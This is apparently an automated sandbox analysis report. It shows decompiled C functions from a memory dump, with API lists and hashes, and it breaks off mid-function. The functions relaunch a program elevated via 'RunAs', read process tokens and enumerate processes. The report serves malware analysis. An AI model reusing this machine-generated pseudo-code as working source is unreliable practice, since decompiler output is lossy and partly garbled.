                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 87%
                                                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                  				void _v530;
                                                                                                  				char _v532;
                                                                                                  				void _v1042;
                                                                                                  				long _v1044;
                                                                                                  				long _v4116;
                                                                                                  				char _v5164;
                                                                                                  				void* __edi;
                                                                                                  				void* _t27;
                                                                                                  				void* _t38;
                                                                                                  				void* _t44;
                                                                                                  
                                                                                                  				E0040B550(0x142c, __ecx);
                                                                                                  				_v1044 = 0;
                                                                                                  				memset( &_v1042, 0, 0x1fc);
                                                                                                  				_v532 = 0;
                                                                                                  				memset( &_v530, 0, 0x208);
                                                                                                  				E00404AD9( &_v532);
                                                                                                  				_pop(_t44);
                                                                                                  				E00405AA7( &_v5164);
                                                                                                  				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                  				_t61 = _t27;
                                                                                                  				if(_t27 != 0) {
                                                                                                  					wcscpy( &_v1044,  &_v4116);
                                                                                                  					_pop(_t44);
                                                                                                  				}
                                                                                                  				wcscpy(0x40fb90, _a8);
                                                                                                  				wcscpy(0x40fda0, L"general");
                                                                                                  				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                  				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                  				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                  				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                  				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                  				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                  				wcscpy(0x40fda0, L"strings");
                                                                                                  				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                  				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                  				return _t38;
                                                                                                  			}













                                                                                                  0x00406466
                                                                                                  0x0040647d
                                                                                                  0x00406484
                                                                                                  0x00406499
                                                                                                  0x004064a0
                                                                                                  0x004064af
                                                                                                  0x004064b4
                                                                                                  0x004064bb
                                                                                                  0x004064cd
                                                                                                  0x004064d2
                                                                                                  0x004064d4
                                                                                                  0x004064e4
                                                                                                  0x004064ea
                                                                                                  0x004064ea
                                                                                                  0x004064f3
                                                                                                  0x00406503
                                                                                                  0x00406514
                                                                                                  0x00406525
                                                                                                  0x0040653b
                                                                                                  0x0040654e
                                                                                                  0x00406568
                                                                                                  0x00406572
                                                                                                  0x0040657a
                                                                                                  0x00406582
                                                                                                  0x0040658a
                                                                                                  0x00406596

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00406484
                                                                                                  • memset.MSVCRT ref: 004064A0
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                  • API String ID: 3037099051-2314623505
                                                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401C26(long _a4) {
                                                                                                  				struct _SHELLEXECUTEINFOW _v68;
                                                                                                  				void _v582;
                                                                                                  				char _v584;
                                                                                                  				void _v1110;
                                                                                                  				char _v1112;
                                                                                                  				long _t23;
                                                                                                  				int _t36;
                                                                                                  				void* _t43;
                                                                                                  				long _t44;
                                                                                                  
                                                                                                  				_t44 = 0;
                                                                                                  				_t23 = GetCurrentProcessId();
                                                                                                  				_v584 = 0;
                                                                                                  				memset( &_v582, 0, 0x1fe);
                                                                                                  				_v1112 = 0;
                                                                                                  				memset( &_v1110, 0, 0x208);
                                                                                                  				E00404AD9( &_v1112);
                                                                                                  				_push(_t23);
                                                                                                  				_push(0);
                                                                                                  				_push(_a4);
                                                                                                  				_push(L"/SpecialRun %I64x %d");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v584);
                                                                                                  				L0040B1EC();
                                                                                                  				memset( &(_v68.fMask), 0, 0x38);
                                                                                                  				_v68.lpFile =  &_v1112;
                                                                                                  				_v68.lpParameters =  &_v584;
                                                                                                  				_v68.cbSize = 0x3c;
                                                                                                  				_v68.lpVerb = L"RunAs";
                                                                                                  				_v68.fMask = 0x40;
                                                                                                  				_v68.nShow = 5;
                                                                                                  				_t36 = ShellExecuteExW( &_v68);
                                                                                                  				_t43 = _v68.hProcess;
                                                                                                  				if(_t36 == 0) {
                                                                                                  					_t44 = GetLastError();
                                                                                                  				} else {
                                                                                                  					WaitForSingleObject(_t43, 0x5dc);
                                                                                                  					_a4 = 0;
                                                                                                  					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
                                                                                                  						_t44 = _a4;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t44;
                                                                                                  			}












                                                                                                  0x00401c31
                                                                                                  0x00401c33
                                                                                                  0x00401c48
                                                                                                  0x00401c4f
                                                                                                  0x00401c61
                                                                                                  0x00401c68
                                                                                                  0x00401c74
                                                                                                  0x00401c79
                                                                                                  0x00401c7a
                                                                                                  0x00401c7b
                                                                                                  0x00401c84
                                                                                                  0x00401c89
                                                                                                  0x00401c8e
                                                                                                  0x00401c8f
                                                                                                  0x00401c9b
                                                                                                  0x00401ca6
                                                                                                  0x00401caf
                                                                                                  0x00401cb9
                                                                                                  0x00401cc0
                                                                                                  0x00401cc7
                                                                                                  0x00401cce
                                                                                                  0x00401cd5
                                                                                                  0x00401cdd
                                                                                                  0x00401ce0
                                                                                                  0x00401d14
                                                                                                  0x00401ce2
                                                                                                  0x00401ce8
                                                                                                  0x00401cf3
                                                                                                  0x00401cfe
                                                                                                  0x00401d09
                                                                                                  0x00401d09
                                                                                                  0x00401cfe
                                                                                                  0x00401d1b

                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                  • memset.MSVCRT ref: 00401C4F
                                                                                                  • memset.MSVCRT ref: 00401C68
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                  • memset.MSVCRT ref: 00401C9B
                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                  • API String ID: 903100921-3385179869
                                                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				int _v16;
                                                                                                  				void* _v20;
                                                                                                  				void* _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v44;
                                                                                                  				char _v52;
                                                                                                  				char _v60;
                                                                                                  				void _v315;
                                                                                                  				char _v316;
                                                                                                  				void _v826;
                                                                                                  				char _v828;
                                                                                                  				void _v1338;
                                                                                                  				char _v1340;
                                                                                                  				void* __esi;
                                                                                                  				void* _t61;
                                                                                                  				_Unknown_base(*)()* _t93;
                                                                                                  				void* _t94;
                                                                                                  				int _t106;
                                                                                                  				void* _t108;
                                                                                                  				void* _t110;
                                                                                                  
                                                                                                  				_v828 = 0;
                                                                                                  				memset( &_v826, 0, 0x1fe);
                                                                                                  				_v1340 = 0;
                                                                                                  				memset( &_v1338, 0, 0x1fe);
                                                                                                  				_t110 = _t108 + 0x18;
                                                                                                  				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                  				_t113 = _t61;
                                                                                                  				_v20 = _t61;
                                                                                                  				if(_t61 == 0) {
                                                                                                  					L11:
                                                                                                  					if(_v828 == 0) {
                                                                                                  						__eflags = 0;
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  					_push( &_v828);
                                                                                                  					_push( &_v1340);
                                                                                                  					_push(L"%s\\%s");
                                                                                                  					_push(0xff);
                                                                                                  					_push(_a8);
                                                                                                  					L0040B1EC();
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  				_v8 = 0;
                                                                                                  				_v24 = 0;
                                                                                                  				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                  				_t106 = _v24;
                                                                                                  				if(_t106 == 0) {
                                                                                                  					_t32 =  &_v20; // 0x4059ec
                                                                                                  					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                  					_v316 = 0;
                                                                                                  					memset( &_v315, 0, 0xfe);
                                                                                                  					_t110 = _t110 + 0x20;
                                                                                                  					_v16 = 0xff;
                                                                                                  					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                  					if(__eflags == 0) {
                                                                                                  						L9:
                                                                                                  						CloseHandle(_v20);
                                                                                                  						if(_v8 != 0) {
                                                                                                  							FreeLibrary(_v8);
                                                                                                  						}
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_push( &_v28);
                                                                                                  					_push( &_a4);
                                                                                                  					_push( &_v1340);
                                                                                                  					_push( &_v12);
                                                                                                  					_push( &_v828);
                                                                                                  					_a4 = 0xff;
                                                                                                  					_push( &_v316);
                                                                                                  					L8:
                                                                                                  					_v12 = 0xff;
                                                                                                  					E0040906D( &_v8, _t117);
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_v316 = 0;
                                                                                                  				memset( &_v315, 0, 0xff);
                                                                                                  				_v12 = _t106;
                                                                                                  				_t110 = _t110 + 0xc;
                                                                                                  				_a4 = 0;
                                                                                                  				if(E00408F72( &_v8) == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                  				if(_t93 == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                  				_t117 = _t94;
                                                                                                  				if(_t94 == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_push( &_v28);
                                                                                                  				_push( &_v12);
                                                                                                  				_push( &_v1340);
                                                                                                  				_push( &_v16);
                                                                                                  				_push( &_v828);
                                                                                                  				_push(_v316);
                                                                                                  				_v16 = 0xff;
                                                                                                  				goto L8;
                                                                                                  			}



























                                                                                                  0x00409ab0
                                                                                                  0x00409ab7
                                                                                                  0x00409ac8
                                                                                                  0x00409acf
                                                                                                  0x00409ad4
                                                                                                  0x00409ae0
                                                                                                  0x00409ae6
                                                                                                  0x00409ae8
                                                                                                  0x00409af0
                                                                                                  0x00409c3a
                                                                                                  0x00409c41
                                                                                                  0x00409c67
                                                                                                  0x00000000
                                                                                                  0x00409c67
                                                                                                  0x00409c49
                                                                                                  0x00409c50
                                                                                                  0x00409c51
                                                                                                  0x00409c56
                                                                                                  0x00409c57
                                                                                                  0x00409c5a
                                                                                                  0x00000000
                                                                                                  0x00409c64
                                                                                                  0x00409b00
                                                                                                  0x00409b03
                                                                                                  0x00409b06
                                                                                                  0x00409b0b
                                                                                                  0x00409b10
                                                                                                  0x00409ba9
                                                                                                  0x00409bac
                                                                                                  0x00409bc1
                                                                                                  0x00409bc7
                                                                                                  0x00409bcc
                                                                                                  0x00409bd8
                                                                                                  0x00409bf0
                                                                                                  0x00409bf2
                                                                                                  0x00409c23
                                                                                                  0x00409c26
                                                                                                  0x00409c2f
                                                                                                  0x00409c34
                                                                                                  0x00409c34
                                                                                                  0x00000000
                                                                                                  0x00409c2f
                                                                                                  0x00409bf7
                                                                                                  0x00409bfb
                                                                                                  0x00409c02
                                                                                                  0x00409c06
                                                                                                  0x00409c0d
                                                                                                  0x00409c14
                                                                                                  0x00409c17
                                                                                                  0x00409c18
                                                                                                  0x00409c1b
                                                                                                  0x00409c1e
                                                                                                  0x00000000
                                                                                                  0x00409c1e
                                                                                                  0x00409b1f
                                                                                                  0x00409b25
                                                                                                  0x00409b2a
                                                                                                  0x00409b2d
                                                                                                  0x00409b33
                                                                                                  0x00409b3d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b4b
                                                                                                  0x00409b53
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b6a
                                                                                                  0x00409b6c
                                                                                                  0x00409b6e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b77
                                                                                                  0x00409b7b
                                                                                                  0x00409b82
                                                                                                  0x00409b86
                                                                                                  0x00409b8d
                                                                                                  0x00409b8e
                                                                                                  0x00409b94
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00409AB7
                                                                                                  • memset.MSVCRT ref: 00409ACF
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                  • memset.MSVCRT ref: 00409B25
                                                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                  • memset.MSVCRT ref: 00409BC7
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                  • API String ID: 3504373036-27875219
                                                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409172() {
                                                                                                  				void* _t1;
                                                                                                  				int _t2;
                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                  
                                                                                                  				if( *0x4101bc != 0) {
                                                                                                  					return _t1;
                                                                                                  				}
                                                                                                  				_t2 = E00405436(L"psapi.dll");
                                                                                                  				_t5 = _t2;
                                                                                                  				if(_t5 == 0) {
                                                                                                  					L10:
                                                                                                  					return _t2;
                                                                                                  				} else {
                                                                                                  					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                  					 *0x40f848 = _t2;
                                                                                                  					if(_t2 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                  						 *0x40f840 = _t2;
                                                                                                  						if(_t2 != 0) {
                                                                                                  							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                  							 *0x40f838 = _t2;
                                                                                                  							if(_t2 != 0) {
                                                                                                  								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                  								 *0x40fa6c = _t2;
                                                                                                  								if(_t2 != 0) {
                                                                                                  									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                  									 *0x40f844 = _t2;
                                                                                                  									if(_t2 != 0) {
                                                                                                  										 *0x4101bc = 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if( *0x4101bc == 0) {
                                                                                                  						_t2 = FreeLibrary(_t5);
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  			}






                                                                                                  0x00409179
                                                                                                  0x00409209
                                                                                                  0x00409209
                                                                                                  0x00409185
                                                                                                  0x0040918a
                                                                                                  0x0040918f
                                                                                                  0x00409208
                                                                                                  0x00000000
                                                                                                  0x00409191
                                                                                                  0x0040919e
                                                                                                  0x004091a2
                                                                                                  0x004091a7
                                                                                                  0x004091af
                                                                                                  0x004091b3
                                                                                                  0x004091b8
                                                                                                  0x004091c0
                                                                                                  0x004091c4
                                                                                                  0x004091c9
                                                                                                  0x004091d1
                                                                                                  0x004091d5
                                                                                                  0x004091da
                                                                                                  0x004091e2
                                                                                                  0x004091e6
                                                                                                  0x004091eb
                                                                                                  0x004091ed
                                                                                                  0x004091ed
                                                                                                  0x004091eb
                                                                                                  0x004091da
                                                                                                  0x004091c9
                                                                                                  0x004091b8
                                                                                                  0x004091ff
                                                                                                  0x00409202
                                                                                                  0x00409202
                                                                                                  0x00000000
                                                                                                  0x004091ff

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 1182944575-70141382
                                                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004090EE() {
                                                                                                  				void* _t1;
                                                                                                  				_Unknown_base(*)()* _t2;
                                                                                                  				struct HINSTANCE__* _t4;
                                                                                                  
                                                                                                  				if( *0x4101b8 != 0) {
                                                                                                  					return _t1;
                                                                                                  				}
                                                                                                  				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  				_t4 = _t2;
                                                                                                  				if(_t4 == 0) {
                                                                                                  					L9:
                                                                                                  					return _t2;
                                                                                                  				}
                                                                                                  				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                  				 *0x40f83c = _t2;
                                                                                                  				if(_t2 != 0) {
                                                                                                  					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                  					 *0x40f834 = _t2;
                                                                                                  					if(_t2 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                  						 *0x40f830 = _t2;
                                                                                                  						if(_t2 != 0) {
                                                                                                  							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                  							 *0x40f5c4 = _t2;
                                                                                                  							if(_t2 != 0) {
                                                                                                  								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                  								 *0x40f828 = _t2;
                                                                                                  								if(_t2 != 0) {
                                                                                                  									 *0x4101b8 = 1;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L9;
                                                                                                  			}






                                                                                                  0x004090f5
                                                                                                  0x00409171
                                                                                                  0x00409171
                                                                                                  0x004090fd
                                                                                                  0x00409103
                                                                                                  0x00409107
                                                                                                  0x00409170
                                                                                                  0x00000000
                                                                                                  0x00409170
                                                                                                  0x00409116
                                                                                                  0x0040911a
                                                                                                  0x0040911f
                                                                                                  0x00409127
                                                                                                  0x0040912b
                                                                                                  0x00409130
                                                                                                  0x00409138
                                                                                                  0x0040913c
                                                                                                  0x00409141
                                                                                                  0x00409149
                                                                                                  0x0040914d
                                                                                                  0x00409152
                                                                                                  0x0040915a
                                                                                                  0x0040915e
                                                                                                  0x00409163
                                                                                                  0x00409165
                                                                                                  0x00409165
                                                                                                  0x00409163
                                                                                                  0x00409152
                                                                                                  0x00409141
                                                                                                  0x00409130
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                  • API String ID: 667068680-3953557276
                                                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				char _v1028;
                                                                                                  				void _v1538;
                                                                                                  				char _v1540;
                                                                                                  				void* _t39;
                                                                                                  				intOrPtr* _t50;
                                                                                                  				void* _t61;
                                                                                                  
                                                                                                  				_t50 = __ecx;
                                                                                                  				_push(0x1fe);
                                                                                                  				_push(0);
                                                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                  					_v1540 = 0;
                                                                                                  					memset( &_v1538, ??, ??);
                                                                                                  					_v1028 = 0;
                                                                                                  					memset( &_v1026, 0, 0x1fe);
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v514, 0, 0x1fe);
                                                                                                  					L0040B1EC();
                                                                                                  					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                  					L0040B1EC();
                                                                                                  					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                  					if (_t39 != 0) goto L3;
                                                                                                  					return _t39;
                                                                                                  				}
                                                                                                  				_v516 = 0;
                                                                                                  				memset( &_v514, ??, ??);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fe);
                                                                                                  				L0040B1EC();
                                                                                                  				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                  				L0040B1EC();
